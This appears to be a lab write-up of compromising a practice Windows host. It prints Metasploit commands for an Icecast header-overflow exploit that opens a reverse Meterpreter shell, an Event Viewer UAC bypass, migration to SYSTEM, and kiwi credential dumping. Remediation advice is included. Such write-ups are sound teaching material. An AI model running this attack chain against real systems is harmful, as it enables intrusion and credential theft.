Case file

Icecast header overflow, UAC bypass, and SYSTEM token migration

Foundations Windows engagement: Icecast on 8000 (CVE-2004-1561) yielded Meterpreter as Dark; bypassuac_eventvwr elevated integrity; migration into spoolsv.exe and kiwi recovered SYSTEM and credentials.

Foundations26 minWindows · Icecast · Metasploit · Privilege Escalation
  • Unauthenticated Icecast RCE landed Meterpreter. Local exploit suggester pointed at Event Viewer UAC bypass; migrating to a SYSTEM process completed the engagement.

  • nmap pinned Icecast on 8000; Metasploit icecast_header opened Meterpreter as Dark.

  • bypassuac_eventvwr elevated the session; migrate to spoolsv.exe and kiwi dumped credentials.

01

Engagement summary

Unauthenticated Icecast RCE landed Meterpreter. Local exploit suggester pointed at Event Viewer UAC bypass; migrating to a SYSTEM process completed the engagement.

ICE (10.10.203.69 / DARK-PC) exposed SMB, RDP, and Icecast on 8000. Metasploit exploit/windows/http/icecast_header (CVE-2004-1561) returned a Meterpreter session as Dark. post/multi/recon/local_exploit_suggester recommended exploit/windows/local/bypassuac_eventvwr; after elevation we migrated into spoolsv.exe for NT AUTHORITY\SYSTEM and loaded kiwi to dump Dark:Password01! and local hashes. MS17-010 appeared in vuln scans but was not required for this path.

Business impact

Unpatched media servers on the corporate network are remote code execution. UAC bypasses turn medium-integrity shells into Administrators. Patch or remove Icecast, restrict 8000, and monitor for Event Viewer UAC abuse and unexpected SYSTEM migrations.

02

Icecast CVE-2004-1561 RCE

nmap pinned Icecast on 8000; Metasploit icecast_header opened Meterpreter as Dark.

OPERATOR · NMAP

savvy@lab:~$ nmap 10.10.203.69 -sV -Pn -A --script=vuln -T4

445/tcp open microsoft-ds

3389/tcp open ms-wbt-server

8000/tcp open http Icecast

OPERATOR · MSF ICECAST

savvy@lab:~$ msfconsole -q

msf6 > use exploit/windows/http/icecast_header

msf6 > set RHOSTS 10.10.203.69

msf6 > set LHOST tun0

msf6 > run

Meterpreter session 1 opened

meterpreter > getuid

Server username: DARK-PC\Dark

03

UAC bypass and SYSTEM migration

bypassuac_eventvwr elevated the session; migrate to spoolsv.exe and kiwi dumped credentials.

OPERATOR · UAC / SYSTEM

meterpreter > run post/multi/recon/local_exploit_suggester

exploit/windows/local/bypassuac_eventvwr

msf6 > use exploit/windows/local/bypassuac_eventvwr

msf6 > set SESSION 1

msf6 > run

meterpreter > migrate -N spoolsv.exe

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > load kiwi

meterpreter > creds_all

Dark : Password01!

Remediation

Upgrade or remove Icecast; block 8000 at the edge. Enable UAC hardening and application control. Rotate credentials after any Meterpreter foothold.